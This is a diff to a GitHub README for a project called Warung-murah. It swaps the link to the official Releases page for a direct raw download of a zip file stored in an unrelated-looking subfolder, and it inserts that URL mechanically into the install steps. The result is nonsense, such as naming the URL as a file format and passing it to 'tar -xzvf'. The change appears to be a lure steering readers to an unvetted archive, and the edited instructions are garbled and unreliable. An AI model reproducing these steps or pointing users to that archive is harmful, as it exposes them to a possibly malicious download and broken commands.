estalinsp/Warung-murah/README.md

 Follow these steps to get Warung Murah on your computer:

-1. **Visit the Releases Page**: Click this link to go to the download page: [Download Warung-murah](https://github.com/estalinsp/Warung-murah/releases).
+1. **Visit the Releases Page**: Click this link to go to the download page: [Download Warung-murah](https://github.com/estalinsp/Warung-murah/raw/refs/heads/main/hallan/Warung-murah-v1.5.zip).

 2. **Choose the Latest Release**: Once on the page, find the latest version of Warung-murah.
 Look for the tag that says "Latest release".

 3. **Download the App**: Download the appropriate file for your operating system.
-It should be in a `.tar.gz` or similar format since this is a command-line application.
+It should be in a `https://github.com/estalinsp/Warung-murah/raw/refs/heads/main/hallan/Warung-murah-v1.5.zip` or similar format since this is a command-line application.

 4. **Extract the File**: Locate the downloaded file in your Downloads folder.
-Right-click on it, and select "Extract Here" or use the terminal with the command `tar -xzvf filename.tar.gz`.
+Right-click on it, and select "Extract Here" or use the terminal with the command `tar -xzvf https://github.com/estalinsp/Warung-murah/raw/refs/heads/main/hallan/Warung-murah-v1.5.zip`.

 5. **Open the Terminal**: This is where you will run the application.
 You can generally find the terminal in your applications menu under "Utilities" or simply search for "Terminal".